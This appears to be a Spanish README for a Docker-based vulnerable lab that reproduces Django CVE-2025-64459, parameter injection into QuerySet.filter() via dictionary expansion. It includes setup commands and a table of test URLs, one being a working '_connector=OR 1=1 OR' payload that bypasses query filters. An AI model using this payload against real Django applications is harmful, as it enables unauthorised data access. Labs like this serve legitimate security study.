
Un banco de pruebas autocontenido para Django CVE-2025-64459. Demuestra la inyección de parámetros en QuerySet.filter() mediante expansión de diccionarios usando Docker.
Un banco de pruebas autocontenido para Django CVE-2025-64459. Demuestra la inyección de parámetros en QuerySet.filter() mediante expansión de diccionario usando Docker.
CVE-2025-64459 es una vulnerabilidad de alta gravedad en Django (específicamente versiones < 5.1.14) que permite la inyección de parámetros en QuerySet.filter() cuando la entrada del usuario se pasa directamente mediante expansión de diccionario (por ejemplo, **request.GET).
Los atacantes pueden inyectar parámetros internos como _connector para manipular la lógica de consulta (por ejemplo, cambiar AND a OR), potencialmente evadiendo filtros y accediendo a datos no autorizados.
Si tienes instalado el CLI de Vulnerable Target o quieres ejecutarlo desde el código fuente:
Clona el repositorio de Vulnerable Target:
git clone https://github.com/HappyHackingSpace/vulnerable-target
cd vulnerable-target
Ejecuta el laboratorio usando el ID:
go run cmd/vt/main.go start --id vt-2025-64459
b00m!
con Nuclei
| Descripción | Enlace |
|---|---|
| Mostrar todo (búsqueda vacía) | /? |
| Búsqueda normal | /?title__icontains=Public |
| Intento de explotación (Privado) | /?status=private&title__icontains=Area |
| Exploit de _connector (CVE-2025-64459) | /?_connector=OR 1=1 OR&title__icontains=Public |
Este repositorio es solo para fines educativos y de investigación. No lo utilices en sistemas que no te pertenezcan o para los que no tengas permiso explícito de pruebas. El autor no se responsabiliza del mal uso de esta información.